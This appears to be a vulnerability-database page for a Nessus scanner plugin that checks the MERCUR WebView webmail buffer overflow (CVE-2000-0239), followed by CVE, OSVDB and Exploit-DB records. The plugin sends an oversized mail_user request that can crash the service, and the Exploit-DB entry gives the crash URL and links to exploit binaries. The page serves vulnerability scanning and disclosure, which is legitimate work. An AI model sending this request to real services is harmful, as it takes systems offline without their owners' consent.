MERCUR WebView WebMail Server mail_user Parameter DoS
2000-03-15T00:00:00
ID MERCURE_WEBVIEW.NASL Type nessus Reporter This script is Copyright (C) 2000-2021 Tenable Network Security, Inc. Modified 2000-03-15T00:00:00
Description
The remote WebView service does not perform proper bounds checking on the
mail_user parameter when processing the following request:
GET /mmain.html&mail_user=aaa[...]aaa
A remote attacker could exploit this to crash the service, or
potentially execute arbitrary code.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration pass: when the engine loads the plugin with 'description' set,
# only the metadata below is recorded and the script stops at exit(0) without
# sending any traffic.
if (description)
{
  # Plugin identity and revision.
  script_id(10346);
  script_version("1.30");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  # External identifiers for the flaw this plugin checks.
  script_cve_id("CVE-2000-0239");
  script_bugtraq_id(1056);

  script_name(english:"MERCUR WebView WebMail Server mail_user Parameter DoS");
  script_summary(english:"Checks for a buffer overflow");

  # Report text. The string values span several source lines, so their
  # continuation lines stay at column 0 to keep the text unchanged.
  script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host has a buffer overflow
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote WebView service does not do proper bounds checking when
processing the following request :
GET /mmain.html&mail_user=aaa[...]aaa
A remote attacker could exploit this to crash the service, or
potentially execute arbitrary code.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Mar/200");
  script_set_attribute(attribute:"solution", value:"Upgrade to the latest version of this software.");

  # CVSS v2 base vector: network access, low complexity, no authentication,
  # partial confidentiality/integrity/availability impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  # CVSS v2 temporal vector: high exploitability, remediation level
  # unavailable, report confidence not defined.
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2000/03/16");
  script_set_attribute(attribute:"plugin_publication_date", value:"2000/03/15");

  # The result is flagged as a potential, not a confirmed, vulnerability.
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_DENIAL: the check is classed as a denial-of-service test because the
  # request it sends may take the target service down.
  script_category(ACT_DENIAL);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.");

  # Scheduling constraints: depends on http_version.nasl, requires the
  # paranoid-report setting key, and requires TCP port 1080.
  script_dependencie("http_version.nasl");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports(1080);

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
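# Detection pass. The request sent below can crash a vulnerable service, and
# the plugin only proceeds when report_paranoia is at least 2.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# WebView is probed on its fixed port, the same one named in
# script_require_ports(1080).
port = 1080;

if (! get_port_state(port)) exit(0, "Port "+port+" is closed");

# Baseline: a service that is already unresponsive cannot be tested, and
# would otherwise be reported as crashed by this check.
if (http_is_dead(port: port)) exit(0, "Web server on port "+port+" is dead");

# Send the request from the plugin description with a 2000-character
# mail_user value.
req2 = string("/mmain.html&mail_user=", crap(2000));
w = http_send_recv3(port: port, item:req2, method:"GET");

# A reply means the service handled the request and kept running.
if (! isnull(w)) exit(0, "Web server on port "+port+" answered the request and is likely not affected");

# A missing reply on its own can also be a timeout or a filtered connection,
# so confirm that the service really stopped answering before reporting.
# NOTE(review): a service that is restarted automatically between the two
# probes would not be reported; confirm this trade-off suits the scan policy.
if (! http_is_dead(port: port)) exit(0, "Web server on port "+port+" is still responding after the request");

security_hole(port);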
{"id": "MERCURE_WEBVIEW.NASL", "bulletinFamily": "scanner", "title": "MERCUR WebView WebMail Server mail_user Parameter DoS", "description": "The remote WebView service does not do proper bounds checking when\nprocessing the following request :\n\n GET /mmain.html&mail_user=aaa[...]aaa\n\nA remote attacker could exploit this to crash the service, or\npotentially execute arbitrary code.", "published": "2000-03-15T00:00:00", "modified": "2000-03-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/10346", "reporter": "This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.", "references": ["https://seclists.org/bugtraq/2000/Mar/200"], "cvelist": ["CVE-2000-0239"], "type": "nessus", "lastseen": "2021-01-20T12:07:06", "edition": 25, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0239"]}, {"type": "osvdb", "idList": ["OSVDB:10887"]}, {"type": "exploitdb", "idList": ["EDB-ID:19810"]}], "modified": "2021-01-20T12:07:06", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-01-20T12:07:06", "rev": 2}, "vulnersScore": 6.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(10346);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2000-0239\");\n script_bugtraq_id(1056);\n\n script_name(english:\"MERCUR WebView WebMail Server mail_user Parameter DoS\");\n script_summary(english:\"Checks for a buffer overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application on the remote host has a buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote WebView service does not do proper bounds checking when\nprocessing the following 
request :\n\n GET /mmain.html&mail_user=aaa[...]aaa\n\nA remote attacker could exploit this to crash the service, or\npotentially execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2000/Mar/200\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to the latest version of this software.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2000/03/15\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(1080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = 1080;\n\nif (! get_port_state(port)) exit(0, \"Port \"+port+\" is closed\");\n\nif (http_is_dead(port: port)) exit(0, \"Web server on port \"+port+\" is dead\");\n\nreq2 = string(\"/mmain.html&mail_user=\", crap(2000));\nw = http_send_recv3(port: port, item:req2, method:\"GET\");\nif (isnull(w)) security_hole(port);\n", "naslFamily": "CGI abuses", "pluginID": "10346", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:19:02", "description": "Buffer overflow in the MERCUR WebView WebMail server allows remote attackers to cause a denial of service via a long mail_user parameter in the GET request.", "edition": 4, "cvss3": {}, "published": "2000-03-15T05:00:00", "title": "CVE-2000-0239", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2000-0239"], "modified": "2016-10-18T02:06:00", "cpe": ["cpe:/a:atrium_software:mercur_pop3_server:3.20.01", "cpe:/a:atrium_software:mercur_mailserver:3.2", "cpe:/a:atrium_software:mercur_imap4_server:3.20.01"], "id": "CVE-2000-0239", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0239", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:atrium_software:mercur_imap4_server:3.20.01:*:*:*:*:*:*:*", "cpe:2.3:a:atrium_software:mercur_mailserver:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:atrium_software:mercur_pop3_server:3.20.01:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2000-0239"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-03/0160.html\nISS X-Force ID: 4120\n[CVE-2000-0239](https://vulners.com/cve/CVE-2000-0239)\nBugtraq ID: 1056\n", "modified": "2000-03-16T00:00:00", "published": "2000-03-16T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:10887", "id": "OSVDB:10887", "type": "osvdb", "title": 
"MERCUR WebView WebMail Server mail_user Parameter DoS", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:46:56", "description": "Atrium Software Mercur WebView WebMail-Client 1.0 Buffer Overflow. CVE-2000-0239. Dos exploit for windows platform", "published": "2000-03-16T00:00:00", "type": "exploitdb", "title": "Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0239"], "modified": "2000-03-16T00:00:00", "id": "EDB-ID:19810", "href": "https://www.exploit-db.com/exploits/19810/", "sourceData": "source: http://www.securityfocus.com/bid/1056/info\r\n\r\nWebView WebMail-Client is an add-on for the Mercur SMTP/POP3/IMAP4 Mail Server which allows a user to access email through a web browser.\r\n\r\nInsufficient boundary checking exists in the code which handles GET requests, specifically on port 1080. Issuing a GET request containing a string of over 1000 characters on port 1080 will cause the WebView WebMail-Client application to crash.\r\n\r\neg.\r\nhttp: //target/&mail_user=<string containing over 1000 characters>\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19810-1.exe\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19810-2.zip", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19810/"}]}